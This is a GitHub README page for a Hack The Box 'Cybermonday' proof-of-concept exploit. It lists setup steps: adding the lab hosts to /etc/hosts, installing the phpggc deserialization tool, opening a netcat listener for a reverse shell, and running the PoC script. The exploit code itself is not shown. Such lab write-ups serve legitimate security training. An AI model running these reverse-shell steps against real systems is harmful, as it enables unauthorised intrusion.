Skip to content

Latest commit

 

History

History
9 lines (7 loc) · 340 Bytes

README.md

File metadata and controls

9 lines (7 loc) · 340 Bytes

HTB_Cybermonday

Usage: python3 HTB_Cybermonday_poc.py <listener ip> <listener port>

1. echo "10.10.11.228 cybermonday.htb" >> /etc/hosts

2. echo "10.10.11.228 webhooks-api-beta.cybermonday.htb" >> /etc/hosts

3. apt install phpggc

4. nc -nvlp 4444

5. python3 HTB_Cybermonday_poc.py 10.10.14.1 4444